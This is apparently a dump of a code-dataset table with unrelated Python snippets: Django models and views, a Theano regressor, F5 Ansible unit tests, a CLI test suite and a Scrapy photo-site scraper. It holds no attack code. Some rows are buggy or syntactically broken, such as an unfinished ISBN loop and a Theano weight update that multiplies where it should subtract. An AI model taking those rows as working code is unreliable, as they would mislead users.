index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
17,000 | 3dc43940957aa79137a2404c34b250e4af9d4ee6 | #base Namer class
class Namer():
def __init__(self):
self.last=""
self.first=""
#derived namer class for First <space> Last
class FirstFirst(Namer):
def __init__(self, namestring):
super().__init__()
i = namestring.find(" ") #find space between names
if i > 0 :
names = namestring.split()
self.first = names[0]
self.last = names[1]
else:
self.last = namestring
#derived Namer class for Last <comma> First
class LastFirst(Namer):
def __init__(self, namestring):
super().__init__()
i = namestring.find(",") # find comma between names
if i > 0 :
names = namestring.split(",")
self.last = names[0]
self.first = names[1]
else:
self.last = namestring
"""The NameFactory returns an instance of the Namer class that separates first and last names
depending on whether a comma is present"""
class NamerFactory():
def __init__(self, namestring):
self.name = namestring
def getNamer(self):
i = self.name.find(",") # if it finds a comma
if i>0:
return LastFirst(self.name) # get the LastFirst class
else:
return FirstFirst(self.name) # else get the FirstFirst
class Builder:
def compute(self):
name = ""
while name != 'quit':
name = input("Enter name: ") # get the name string
# get the Namer Factory and then the namer class
namerFact = NamerFactory(name) # get namer factory
namer = namerFact.getNamer() # get namer
print(namer.first, namer.last)
def main():
bld = Builder()
bld.compute()
### Here we go ####
if __name__ == "__main__":
main() |
17,001 | 2fa8dfcb6ffec8003bda378ae12f2d0aaaf64cf8 | """
Dataset loading
"""
import numpy
from app import app
def load_captions(captions_dataset_path):
app.logger.info('Loading Captions from {}'.format(captions_dataset_path))
captions = list()
with open(captions_dataset_path, 'rb') as f:
captions = [line.strip() for line in f]
app.logger.info('Finished loading Captions from {}'.format(captions_dataset_path))
return captions
def load_image_features(image_features_path):
app.logger.info('Loading image feautres from {}'.format(image_features_path))
image_features = numpy.load(image_features_path)
app.logger.info('Finished loading image feautres from {}'.format(image_features_path))
return image_features |
17,002 | 207e87b6c0c18bdcfd9ad34b0cf84d5d0b6c7ed6 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.shortcuts import render
from rest_framework import viewsets
from rest_framework.permissions import IsAuthenticated,IsAdminUser
from .models import *
from .serializers import *
# Create your views here.
class ProductoLista(viewsets.ModelViewSet):
serializer_class = CatalogoProductoSerializer
permission_classes = (IsAdminUser,)
def get_queryset(self):
queryset = Producto.objects.all()
return queryset
class InsumoLista(viewsets.ModelViewSet):
serializer_class = InsumoSerializer
permission_classes = (IsAdminUser,)
def get_queryset(self):
queryset = Insumo.objects.all()
return queryset
class TipoInsumoLista(viewsets.ModelViewSet):
serializer_class = TipoInsumoSerializer
queryset = TipoInsumo.objects.all() |
17,003 | dab06b6c9bcd509c44852853ba9684357be486b3 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2017-04-27 04:05
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('HealthNet', '0006_auto_20170426_2052'),
]
operations = [
migrations.AlterField(
model_name='test',
name='testDate',
field=models.DateTimeField(default=datetime.datetime(2017, 4, 27, 4, 5, 48, 599245)),
),
]
|
17,004 | 0e9d961b92f32eb014d26629ddf39cb4f9de864f | from __future__ import print_function, division
from builtins import range
import numpy as np
import theano
import theano.tensor as T
import q_learning
# deep neural networks are easier to write with frameworks like theano and tensorflow
# because you don't have to derive any of the gradients yourself
# first we looked at Q learning without any function approximation
# then we looked at Q Learning with linear function approximation
# and gradient descent using scikit learning
# then we looked at the same method but without using Q Learning and
# writing the model from scratch with numpy
# now we're going to recreate the same thing in Theano
# this is designed to remind you of all the important parts of a Theano neural network
# (1) Creating graph inputs
# (2) defining shared variables which are parameters that can be updated
# (3) creating the cost function
# (4) defining the updates
# (5) compiling functions to do training and prediction
# all we need to do is build an SGDRegressor to overwrite the one from the other Q Learning script
# most of the work is in the constructor
class SGDRegressor:
def __init__(self, D):
print("Hello Theano!")
# we initialize w as usual and place it in a theano shared
w = np.random.randn(D) / np.sqrt(D)
self.w = theano.shared(w)
self.lr = 10e-2
# then we create out inputs and targets
# X is two dimensional
# Y is one dimenionsal
X = T.matrix('X')
Y = T.vector('Y')
Y_hat = X.dot(self.w)
delta = Y - Y_hat
#squared error is the cost
cost = delta.dot(delta)
grad = T.grad(cost, self.w)
updates = [(self.w, self.w * self.lr*grad)]
self.train_op = theano.function(
inputs=[X,Y],
updates=updates,
)
self.predict_op = theano.function(
inputs=[X],
outputs=Y_hat,
)
def partial_fit(self, X, Y):
self.train_op(X, Y)
def predict(self, X):
return self.predict_op(X)
# all we do is replace Q Learning as the SGDRegressor with the one we just made
if __name__ == '__main__':
q_learning.SGDRegressor = SGDRegressor
q_learning.main() |
17,005 | 908ed27edf0441fd2f3361f42ac70ed5790d999e | # Enumerate a python list and try to print the counter with the list value
list1= ['ananya','pooja','harshitha','anu','nithin']
print(list(enumerate(list1)))
print(enumerate(list1))
# Enumerate a python tuple and try to print the counter with the tuple value
tuple1=('anusha','shravya','priya','karthik','satish')
print(tuple(enumerate(tuple1))) |
17,006 | 349370446a9006b5ecd64a3a0b6d5526a8c8233a | # -*- coding: utf-8 -*-
#
# Copyright: (c) 2018, F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import pytest
import sys
if sys.version_info < (2, 7):
pytestmark = pytest.mark.skip("F5 Ansible modules require Python >= 2.7")
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.f5networks.f5_modules.plugins.modules.bigip_asm_policy_manage import (
V1ModuleParameters, V1Manager, ModuleManager, ArgumentSpec
)
from ansible_collections.f5networks.f5_modules.plugins.module_utils.common import F5ModuleError
from ansible_collections.f5networks.f5_modules.tests.unit.modules.utils import set_module_args
from ansible_collections.f5networks.f5_modules.tests.unit.compat import unittest
from ansible_collections.f5networks.f5_modules.tests.unit.compat.mock import (
Mock, patch
)
fixture_path = os.path.join(os.path.dirname(__file__), 'fixtures')
fixture_data = {}
def load_fixture(name):
path = os.path.join(fixture_path, name)
if path in fixture_data:
return fixture_data[path]
with open(path) as f:
data = f.read()
try:
data = json.loads(data)
except Exception:
pass
fixture_data[path] = data
return data
class TestParameters(unittest.TestCase):
def test_module_parameters_template(self):
args = dict(
name='fake_policy',
state='present',
template='LotusDomino 6.5 (http)'
)
p = V1ModuleParameters(params=args)
assert p.name == 'fake_policy'
assert p.state == 'present'
assert p.template == 'POLICY_TEMPLATE_LOTUSDOMINO_6_5_HTTP'
class TestManager(unittest.TestCase):
def setUp(self):
self.spec = ArgumentSpec()
self.policy = os.path.join(fixture_path, 'fake_policy.xml')
self.patcher1 = patch('time.sleep')
self.patcher1.start()
self.p1 = patch('ansible_collections.f5networks.f5_modules.plugins.modules.bigip_asm_policy_manage.module_provisioned')
self.m1 = self.p1.start()
self.m1.return_value = True
self.p2 = patch('ansible_collections.f5networks.f5_modules.plugins.modules.bigip_asm_policy_manage.tmos_version')
self.p3 = patch('ansible_collections.f5networks.f5_modules.plugins.modules.bigip_asm_policy_manage.send_teem')
self.m2 = self.p2.start()
self.m2.return_value = '14.1.0'
self.m3 = self.p3.start()
self.m3.return_value = True
def tearDown(self):
self.patcher1.stop()
self.p1.stop()
self.p2.stop()
self.p3.stop()
def test_activate_create_from_template(self, *args):
set_module_args(dict(
name='fake_policy',
template='OWA Exchange 2007 (https)',
state='present',
active='yes',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
current = V1ModuleParameters(params=load_fixture('load_asm_policy_inactive.json'))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
v1 = V1Manager(module=module)
v1.exists = Mock(return_value=False)
v1.import_to_device = Mock(return_value=True)
v1.wait_for_task = Mock(side_effect=[True, True])
v1.read_current_from_device = Mock(return_value=current)
v1.apply_on_device = Mock(return_value=True)
v1.create_from_template_on_device = Mock(return_value=True)
v1._file_is_missing = Mock(return_value=False)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.version_is_less_than_13 = Mock(return_value=False)
mm.get_manager = Mock(return_value=v1)
results = mm.exec_module()
assert results['changed'] is True
assert results['name'] == 'fake_policy'
assert results['template'] == 'OWA Exchange 2007 (https)'
assert results['active'] == 'yes'
def test_activate_create_by_name(self, *args):
set_module_args(dict(
name='fake_policy',
state='present',
active='yes',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
current = V1ModuleParameters(params=load_fixture('load_asm_policy_inactive.json'))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
v1 = V1Manager(module=module)
v1.exists = Mock(return_value=False)
v1.import_to_device = Mock(return_value=True)
v1.wait_for_task = Mock(side_effect=[True, True])
v1.create_on_device = Mock(return_value=True)
v1.create_blank = Mock(return_value=True)
v1.read_current_from_device = Mock(return_value=current)
v1.apply_on_device = Mock(return_value=True)
v1._file_is_missing = Mock(return_value=False)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.version_is_less_than_13 = Mock(return_value=False)
mm.get_manager = Mock(return_value=v1)
results = mm.exec_module()
assert results['changed'] is True
assert results['name'] == 'fake_policy'
assert results['active'] == 'yes'
def test_activate_policy_exists_inactive(self, *args):
set_module_args(dict(
name='fake_policy',
state='present',
active='yes',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
current = V1ModuleParameters(params=load_fixture('load_asm_policy_inactive.json'))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
v1 = V1Manager(module=module)
v1.exists = Mock(return_value=True)
v1.update_on_device = Mock(return_value=True)
v1.wait_for_task = Mock(side_effect=[True, True])
v1.read_current_from_device = Mock(return_value=current)
v1.apply_on_device = Mock(return_value=True)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.version_is_less_than_13 = Mock(return_value=False)
mm.get_manager = Mock(return_value=v1)
results = mm.exec_module()
assert results['changed'] is True
assert results['active'] == 'yes'
def test_activate_policy_exists_active(self, *args):
set_module_args(dict(
name='fake_policy',
state='present',
active='yes',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
current = V1ModuleParameters(params=load_fixture('load_asm_policy_active.json'))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods to force specific logic in the module to happen
v1 = V1Manager(module=module)
v1.exists = Mock(return_value=True)
v1.read_current_from_device = Mock(return_value=current)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.version_is_less_than_13 = Mock(return_value=False)
mm.get_manager = Mock(return_value=v1)
results = mm.exec_module()
assert results['changed'] is False
def test_deactivate_policy_exists_active(self, *args):
set_module_args(dict(
name='fake_policy',
state='present',
active='no',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
current = V1ModuleParameters(params=load_fixture('load_asm_policy_active.json'))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods to force specific logic in the module to happen
v1 = V1Manager(module=module)
v1.exists = Mock(return_value=True)
v1.read_current_from_device = Mock(return_value=current)
v1.update_on_device = Mock(return_value=True)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.version_is_less_than_13 = Mock(return_value=False)
mm.get_manager = Mock(return_value=v1)
results = mm.exec_module()
assert results['changed'] is True
def test_deactivate_policy_exists_inactive(self, *args):
set_module_args(dict(
name='fake_policy',
state='present',
active='no',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
current = V1ModuleParameters(params=load_fixture('load_asm_policy_inactive.json'))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods to force specific logic in the module to happen
v1 = V1Manager(module=module)
v1.exists = Mock(return_value=True)
v1.read_current_from_device = Mock(return_value=current)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.version_is_less_than_13 = Mock(return_value=False)
mm.get_manager = Mock(return_value=v1)
results = mm.exec_module()
assert results['changed'] is False
def test_create_from_template(self, *args):
set_module_args(dict(
name='fake_policy',
template='LotusDomino 6.5 (http)',
state='present',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
current = V1ModuleParameters(params=load_fixture('load_asm_policy_inactive.json'))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods to force specific logic in the module to happen
v1 = V1Manager(module=module)
v1.exists = Mock(return_value=False)
v1.create_from_template_on_device = Mock(return_value=True)
v1.wait_for_task = Mock(side_effect=[True, True])
v1.read_current_from_device = Mock(return_value=current)
v1._file_is_missing = Mock(return_value=False)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.version_is_less_than_13 = Mock(return_value=False)
mm.get_manager = Mock(return_value=v1)
results = mm.exec_module()
assert results['changed'] is True
assert results['name'] == 'fake_policy'
assert results['template'] == 'LotusDomino 6.5 (http)'
def test_create_by_name(self, *args):
set_module_args(dict(
name='fake_policy',
state='present',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
current = V1ModuleParameters(params=load_fixture('load_asm_policy_inactive.json'))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
v1 = V1Manager(module=module)
v1.exists = Mock(return_value=False)
v1.import_to_device = Mock(return_value=True)
v1.wait_for_task = Mock(side_effect=[True, True])
v1.create_on_device = Mock(return_value=True)
v1.create_blank = Mock(return_value=True)
v1.read_current_from_device = Mock(return_value=current)
v1.apply_on_device = Mock(return_value=True)
v1._file_is_missing = Mock(return_value=False)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.version_is_less_than_13 = Mock(return_value=False)
mm.get_manager = Mock(return_value=v1)
results = mm.exec_module()
assert results['changed'] is True
assert results['name'] == 'fake_policy'
def test_delete_policy(self, *args):
set_module_args(dict(
name='fake_policy',
state='absent',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods to force specific logic in the module to happen
v1 = V1Manager(module=module)
v1.exists = Mock(side_effect=[True, False])
v1.remove_from_device = Mock(return_value=True)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.version_is_less_than_13 = Mock(return_value=False)
mm.get_manager = Mock(return_value=v1)
results = mm.exec_module()
assert results['changed'] is True
def test_activate_policy_raises(self, *args):
set_module_args(dict(
name='fake_policy',
state='present',
active='yes',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
current = V1ModuleParameters(params=load_fixture('load_asm_policy_inactive.json'))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
msg = 'Apply policy task failed.'
# Override methods to force specific logic in the module to happen
v1 = V1Manager(module=module)
v1.exists = Mock(return_value=True)
v1.wait_for_task = Mock(return_value=False)
v1.update_on_device = Mock(return_value=True)
v1.read_current_from_device = Mock(return_value=current)
v1.apply_on_device = Mock(return_value=True)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.version_is_less_than_13 = Mock(return_value=False)
mm.get_manager = Mock(return_value=v1)
with pytest.raises(F5ModuleError) as err:
mm.exec_module()
assert str(err.value) == msg
def test_create_policy_raises(self, *args):
set_module_args(dict(
name='fake_policy',
state='present',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
msg = 'Failed to create ASM policy: fake_policy'
# Override methods to force specific logic in the module to happen
v1 = V1Manager(module=module)
v1.exists = Mock(return_value=False)
v1.create_on_device = Mock(return_value=False)
v1._file_is_missing = Mock(return_value=False)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.version_is_less_than_13 = Mock(return_value=False)
mm.get_manager = Mock(return_value=v1)
with pytest.raises(F5ModuleError) as err:
mm.exec_module()
assert str(err.value) == msg
def test_delete_policy_raises(self, *args):
set_module_args(dict(
name='fake_policy',
state='absent',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
msg = 'Failed to delete ASM policy: fake_policy'
# Override methods to force specific logic in the module to happen
v1 = V1Manager(module=module)
v1.exists = Mock(side_effect=[True, True])
v1.remove_from_device = Mock(return_value=True)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.version_is_less_than_13 = Mock(return_value=False)
mm.get_manager = Mock(return_value=v1)
with pytest.raises(F5ModuleError) as err:
mm.exec_module()
assert str(err.value) == msg
|
17,007 | a8ff887345054f2c9b48a17470296b995299221a | isbn12 = input("enter isbn:")
sum1 = 0
sum2 = 0
for index in range(0,12,2):
tem[ = int()] |
17,008 | acb33dc09c8ba893a47fca2d23cb2339d87e13ef | import commands
import requests
import sys
import unittest
class TestCase(unittest.TestCase):
def setUp(self):
self.email_0 = "alice@example.com"
self.email_1 = "bob@example.com"
self.email_2 = "carol@example.com"
self.email_3 = "david@example.com"
self.auth_token_0 = ""
self.auth_token_1 = ""
self.auth_token_2 = ""
self.auth_token_3 = ""
def sign_up(self, email):
cmd = "./job.sh signup " + email
exit_code, msg = commands.getstatusoutput(cmd)
auth_token = msg.split(" ")[-1]
cmd = "./job.sh login " + auth_token
exit_code, msg = commands.getstatusoutput(cmd)
return auth_token
def test_signup(self):
cmd = "./job.sh signup " + self.email_0
exit_code, msg = commands.getstatusoutput(cmd)
self.assertEqual(exit_code, 0)
self.assertIn("successful signup for alice@example.com with id", msg)
exit_code, msg = commands.getstatusoutput(cmd)
self.assertEqual(exit_code >> 8, 1)
self.assertIn("already signed up with that email", msg)
def test_login(self):
cmd = "./job.sh signup " + self.email_0
exit_code, msg = commands.getstatusoutput(cmd)
self.auth_token_0 = msg.split(" ")[-1]
cmd = "./job.sh login " + self.auth_token_0
exit_code, msg = commands.getstatusoutput(cmd)
self.assertEqual(exit_code, 0)
self.assertIn("successful login for alice@example.com with id", msg)
cmd = "./job.sh login " + "abcd0123"
exit_code, msg = commands.getstatusoutput(cmd)
self.assertEqual(exit_code >> 8, 1)
self.assertIn("invalid token", msg)
def test_index(self):
self.auth_token_0 = self.sign_up(self.email_0)
cmd = "./job.sh create " + "foo"
exit_code, msg = commands.getstatusoutput(cmd)
cmd = "./job.sh list"
exit_code, msg = commands.getstatusoutput(cmd)
self.assertEqual(exit_code, 0)
self.assertIn("foo", msg)
self.assertIn("successful list request", msg)
def test_create(self):
self.auth_token_0 = self.sign_up(self.email_0)
cmd = "./job.sh create " + "foo"
exit_code, msg = commands.getstatusoutput(cmd)
self.assertEqual(exit_code, 0)
self.assertIn("successful create for tost with access token", msg)
cmd = "./job.sh create " + ""
exit_code, msg = commands.getstatusoutput(cmd)
self.assertEqual(exit_code >> 8, 1)
self.assertIn("too few command line arguments!", msg)
def test_view(self):
self.auth_token_0 = self.sign_up(self.email_0)
cmd = "./job.sh create " + "foo"
exit_code, msg = commands.getstatusoutput(cmd)
ppgn_token_0 = msg.split(" ")[-1]
# case 3: user is creator of tost that propagation points to
cmd = "./job.sh view " + msg.split(" ")[-1]
exit_code, msg = commands.getstatusoutput(cmd)
self.assertEqual(exit_code, 0)
self.assertIn("foo", msg)
# case 2: user visits resource for the first time
self.auth_token_1 = self.sign_up(self.email_1)
cmd = "./job.sh view " + ppgn_token_0
exit_code, msg = commands.getstatusoutput(cmd)
ppgn_token_1 = msg.split(": ")[0]
cmd = "./job.sh view " + ppgn_token_1
exit_code, msg = commands.getstatusoutput(cmd)
self.assertEqual(exit_code, 0)
self.assertIn("foo", msg)
# case 4: user propagation is of lower priority than propagation in url
self.auth_token_2 = self.sign_up(self.email_2)
cmd = "./job.sh view " + ppgn_token_1
exit_code, msg = commands.getstatusoutput(cmd)
cmd = "./job.sh view " + ppgn_token_0
exit_code, msg = commands.getstatusoutput(cmd)
ppgn_token_2 = msg.split(": ")[0]
cmd = "./job.sh view " + ppgn_token_2
exit_code, msg = commands.getstatusoutput(cmd)
self.assertEqual(exit_code, 0)
self.assertIn("foo", msg)
# case 5: user propagation is of higher priority than propagation in url
self.auth_token_3 = self.sign_up(self.email_3)
cmd = "./job.sh view " + ppgn_token_0
exit_code, msg = commands.getstatusoutput(cmd)
cmd = "./job.sh view " + ppgn_token_1
exit_code, msg = commands.getstatusoutput(cmd)
ppgn_token_3 = msg.split(": ")[0]
cmd = "./job.sh view " + ppgn_token_3
exit_code, msg = commands.getstatusoutput(cmd)
self.assertEqual(exit_code, 0)
self.assertIn("foo", msg)
# case 1: propagation invalid
cmd = "./job.sh login " + self.auth_token_1
exit_code, msg = commands.getstatusoutput(cmd)
cmd = "./job.sh view " + "foo"
exit_code, msg = commands.getstatusoutput(cmd)
self.assertEqual(exit_code >> 8, 1)
self.assertIn("tost not found", msg)
def test_edit(self):
self.auth_token_0 = self.sign_up(self.email_0)
cmd = "./job.sh create " + "foo"
exit_code, msg = commands.getstatusoutput(cmd)
ppgn_token_0 = msg.split(" ")[-1]
cmd = "./job.sh edit " + ppgn_token_0 + " " + "bar"
exit_code, msg = commands.getstatusoutput(cmd)
self.assertEqual(exit_code, 0)
self.assertIn("successful edit for tost with access token", msg)
def test_access(self):
self.auth_token_0 = self.sign_up(self.email_0)
cmd = "./job.sh create " + "foo"
exit_code, msg = commands.getstatusoutput(cmd)
ppgn_token_0 = msg.split(" ")[-1]
self.auth_token_1 = self.sign_up(self.email_1)
cmd = "./job.sh view " + ppgn_token_0
exit_code, msg = commands.getstatusoutput(cmd)
cmd = "./job.sh login " + self.auth_token_0
exit_code, msg = commands.getstatusoutput(cmd)
cmd = "./job.sh access " + ppgn_token_0
exit_code, msg = commands.getstatusoutput(cmd)
self.assertEqual(exit_code, 0)
self.assertIn(self.email_1, msg)
self.assertIn("successful access request", msg)
def test_upgrade(self):
self.auth_token_0 = self.sign_up(self.email_0)
cmd = "./job.sh create " + "foo"
exit_code, msg = commands.getstatusoutput(cmd)
ppgn_token_0 = msg.split(" ")[-1]
self.auth_token_1 = self.sign_up(self.email_1)
cmd = "./job.sh view " + ppgn_token_0
exit_code, msg = commands.getstatusoutput(cmd)
ppgn_token_1 = msg.split(": ")[0]
self.auth_token_2 = self.sign_up(self.email_2)
cmd = "./job.sh view " + ppgn_token_1
exit_code, msg = commands.getstatusoutput(cmd)
ppgn_token_2 = msg.split(": ")[0]
cmd = "./job.sh login " + self.auth_token_0
exit_code, msg = commands.getstatusoutput(cmd)
cmd = "./job.sh upgrade " + ppgn_token_0 + " " + ppgn_token_2
exit_code, msg = commands.getstatusoutput(cmd)
self.assertEqual(exit_code, 0)
self.assertIn("successful upgrade for tost with access token", msg)
cmd = "./job.sh login " + self.auth_token_1
exit_code, msg = commands.getstatusoutput(cmd)
cmd = "./job.sh upgrade " + ppgn_token_1 + " " + ppgn_token_2
exit_code, msg = commands.getstatusoutput(cmd)
self.assertEqual(exit_code >> 8, 1)
self.assertIn("destination not ancestor", msg)
def test_disable(self):
self.auth_token_0 = self.sign_up(self.email_0)
cmd = "./job.sh create " + "foo"
exit_code, msg = commands.getstatusoutput(cmd)
ppgn_token_0 = msg.split(" ")[-1]
self.auth_token_1 = self.sign_up(self.email_1)
cmd = "./job.sh view " + ppgn_token_0
exit_code, msg = commands.getstatusoutput(cmd)
ppgn_token_1 = msg.split(": ")[0]
cmd = "./job.sh login " + self.auth_token_0
exit_code, msg = commands.getstatusoutput(cmd)
cmd = "./job.sh disable " + ppgn_token_0 + " " + ppgn_token_1
exit_code, msg = commands.getstatusoutput(cmd)
self.assertEqual(exit_code, 0)
self.assertIn("successful disable for tost with access token", msg)
cmd = "./job.sh disable " + ppgn_token_0 + " " + ppgn_token_1
exit_code, msg = commands.getstatusoutput(cmd)
self.assertEqual(exit_code >> 8, 1)
self.assertIn("target not descendant of", msg)
def tearDown(self):
requests.get("http://127.0.0.1:5000/reset")
|
17,009 | cccaca0ecb1dc6331423425849c9b8767d065dd7 | from django.contrib.auth import get_user_model
from django.db import models
from django.urls import reverse
from django.utils.text import slugify
from django.utils.timezone import now
from unidecode import unidecode
from phonenumber_field.modelfields import PhoneNumberField
User = get_user_model()
class Tour(models.Model):
title = models.CharField(max_length=250, unique=True)
destination = models.TextField()
description = models.TextField()
price = models.PositiveIntegerField()
duration = models.DurationField(blank=True)
slug = models.SlugField(allow_unicode=True, unique=True)
active = models.BooleanField(default=True)
def get_absolute_url(self):
return reverse('html name', kwargs={'slug': self.slug})
def save(self, *args, **kwargs):
self.slug = slugify(unidecode(self.title))
super().save(*args, **kwargs)
def change_status(self):
self.active = not self.active
super().save()
def __str__(self):
return self.title
class Comment(models.Model):
user = models.ForeignKey(User, name='user', related_name='+', on_delete=models.CASCADE)
tour = models.ForeignKey(Tour, name='tour', related_name='comments', on_delete=models.CASCADE)
text = models.TextField(max_length=4000)
created_at = models.DateTimeField(default=now)
modified_at = models.DateTimeField(default=now)
def __str__(self):
return self.text
class Order(models.Model):
tour = models.ForeignKey(Tour, name='tour', related_name='orders', on_delete=models.PROTECT)
user=models.ForeignKey(User,name='user',related_name='orders',blank=True,null=True, on_delete=False)
first_name = models.CharField(max_length=250,default=None)
last_name = models.CharField(max_length=280,default=None)
mail = models.EmailField( max_length=200,default=None)
ordered_at = models.DateTimeField(default=now)
desired_date = models.DateField(default=now)
person_quantity = models.PositiveIntegerField(default=0)
phone_number = PhoneNumberField(default='')
status = models.CharField(max_length=120)
def save(self, *args, **kwargs):
self.status = 'Pending'
super().save(*args, **kwargs)
def accept(self):
self.status = 'Accepted'
super().save()
def reject(self):
self.status = 'Rejected'
super().save()
def cancel(self):
self.status = 'Canceled'
super().save()
def __str__(self):
return self.tour.title
class Meta:
permissions = (('can_cancel', 'user can cancel'), ('can_accept', 'admin can approve or reject'))
class Images(models.Model):
tour = models.ForeignKey(Tour, default=None, related_name='images', on_delete=False)
image = models.ImageField(upload_to='pictures', verbose_name='Image')
is_main = models.BooleanField(default=False)
def make_main(self):
self.is_main = not self.is_main
self.save()
class Videos(models.Model):
tour = models.ForeignKey(Tour, default=None, related_name='videos', on_delete=False)
video = models.FileField(upload_to='videos', verbose_name='Video')
class UserProfile(models.Model):
user = models.OneToOneField(User, related_name='prof_image', on_delete=models.CASCADE)
avatar = models.ImageField(upload_to='pictures', verbose_name='avatar', default='profile_pic.png')
|
17,010 | a26608c6c2db3af8d94515bec2067e043402305c | # -*- coding:utf-8 -*-
import scrapy
import re
import os
import urllib
import sys
import time
import urllib2
#from XiaMei_Crawler.items import XiaMeiPhotoAlbum
from ..items import XiaMeiPhotoAlbum
from scrapy.selector import Selector
from scrapy.http import HtmlResponse,Request
from urllib2 import URLError, HTTPError
print(os.getcwd())
#test = "https://www.nvshens.com/girl/21501/album/"
g_main_host = "https://www.nvshens.com"
#主目录
g_export_path_root = os.getcwd()+"/export_root"
#创建导出目录
if not os.path.exists(g_export_path_root):
os.makedirs(g_export_path_root)
#相片专辑
g_photoAlbumList = []
#是否导出相片
g_export_photo = True
def save_photo(response, album):
current_url=response.url
#print("AX --> process url:"+current_url)
hxs=Selector(response)
#所有图片
photos = hxs.xpath('//*[@id="hgallery"]/img/@src').extract()
#print("AX --> photo size : %s" % len(photos))
for i in range(len(photos)):
photo_small = photos[i]
photo_org = ""
if photo_small.rfind("/s") == -1:
photo_org = photo_small
else:
photo_start = photo_small[0:photo_small.rfind("/s")]
photo_org = photo_start + "/" + photo_small.split("/")[-1]
album['photos'].append(photo_org)
#print(photos[i])
#print(len(album['photos']))
#获取html内容
def get_html_content(html_label):
rc = re.compile("\<.*?\>" )
return rc.sub('',html_label)
def get_page_source(url):
headers = {'Accept': '*/*',
'Accept-Language': 'en-US,en;q=0.8',
'Cache-Control': 'max-age=0',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36',
'Connection': 'keep-alive',
'Referer': 'http://www.nvshens.com/'
}
req = urllib2.Request(url, None, headers)
try:
response = urllib2.urlopen(req)
page_source = response.read()
return page_source
except BaseException:
print("AX ERROR :"+str(url))
return 0
class XiaMei_spider(scrapy.spiders.Spider):
name="XiaMei"#定义爬虫名
allowed_domains=["nvshens.com"] #搜索的域名范围,也就是爬虫的约束区域,规定爬虫只爬取这个域名下的网页
g_girl_identifier = 0
f_girl_name = 0
def __init__(self, girl_id=None, *args, **kwargs):
self.g_girl_identifier = girl_id
if self.g_girl_identifier == None:
print("AX ---> please input girl id.")
exit(0)
print("girl id :%s" % (self.g_girl_identifier))
one_girl_url = os.path.join( g_main_host, "girl",self. g_girl_identifier )
print("one_girl_url:"+one_girl_url)
self.start_urls=[ one_girl_url ]
#解析
def parse(self, response):
start_url =response.url #爬取时请求的url
tmp = True
print("start url :"+start_url)
total_url = response.xpath('//*[@class="archive_more"]/a/@href').extract_first()
self.f_girl_name = response.xpath('//*[@id="post"]/div[2]/div/div[1]/h1/text()').extract_first()
print("girl_name:"+(self.f_girl_name))
if total_url == None:
print("No Total Page")
yield Request(url = start_url, callback=self.parse_album_url_one)
else:
total_url = g_main_host + total_url
print(" Total_url :"+total_url)
yield Request(url = total_url, callback=self.parse_album_url_total)
if tmp:
print("Temp Return...")
return
#没有全部的
def parse_album_url_one(self, response):
hxs=Selector(response)
items=hxs.xpath('//*[@class="igalleryli_div"]/a/@href').extract()
print("item len : %s " % len(items))
tmp_cnt = 0;
for i in range(len(items)):#遍历div个数
album_url = g_main_host + items[i]
print("AX --> one page request album url : "+album_url)
yield Request(url=album_url, callback=self.parse_album)
#debug 只处理一个目录的
#if(tmp_cnt == 0):
# break;
tmp_cnt = tmp_cnt + 1
